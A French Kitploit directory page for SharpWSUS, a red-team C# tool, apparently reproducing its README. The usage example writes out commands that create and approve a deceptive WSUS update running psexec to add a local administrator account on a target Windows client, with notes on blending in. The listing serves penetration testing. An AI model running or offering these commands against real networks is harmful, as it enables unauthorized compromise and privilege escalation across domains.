Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SharpWSUS — Outil C# pour le mouvement latéral via WSUS en créant, approuvant et déployant des mises à jour malveillantes vers des clients Windows ciblés dans des environnements Active Directory. | Kitploit
Outils/GitHubGitHub/nettitude/sharpwsus
Mouvement LatéralTests d'IntrusionRed Teaming
GitHubnettitude/sharpwsus

SharpWSUS

Outil C# pour le mouvement latéral via WSUS en créant, approuvant et déployant des mises à jour malveillantes vers des clients Windows ciblés dans des environnements Active Directory.

Voir le dépôt
50380il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SharpWSUS

SharpWSUS est un outil en CSharp pour le mouvement latéral via WSUS. Un article de blog correspondant (https://labs.nettitude.com/blog/introducing-sharpwsus/) fournit des informations plus détaillées sur l'outil, son cas d'utilisation et sa détection.

Crédits

Un immense merci aux ressources ci-dessous qui ont fait 90% du travail pour moi. Cet outil n'est qu'une amélioration des éléments ci-dessous pour la fiabilité et la flexibilité C2.

  • https://github.com/AlsidOfficial/WSUSpendu - outil PowerShell pour abuser de WSUS
  • https://github.com/ThunderGunExpress/Thunder_Woosus - outil Csharp pour abuser de WSUS

Menu d'aide

root@kitploit:~
 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team


Commands listed below have optional parameters in <>.

Locate the WSUS server:
    SharpWSUS.exe locate

Inspect the WSUS server, enumerating clients, servers and existing groups:
    SharpWSUS.exe inspect

Create an update (NOTE: The payload has to be a windows signed binary):
    SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MSRC] /description:[description] /url:[url]>

Approve an update:
    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>

Check status of an update:
    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Delete update and clean up groups added:
    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>

Exemple d'utilisation

root@kitploit:~
sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

Remarques

  • Le binaire doit être signé Windows, donc psexec, msiexec, msbuild, etc. peuvent être utiles pour le mouvement latéral.
  • Les métadonnées sur la commande create ne sont pas nécessaires, mais utiles pour se fondre dans l'environnement.
  • Si vous testez dans un laboratoire, le premier essai est généralement rapide, puis chaque mise à jour suivante prendra quelques heures (cela est dû à la façon dont Windows évalue si une mise à jour est déjà installée ou non).
Télécharger l’outil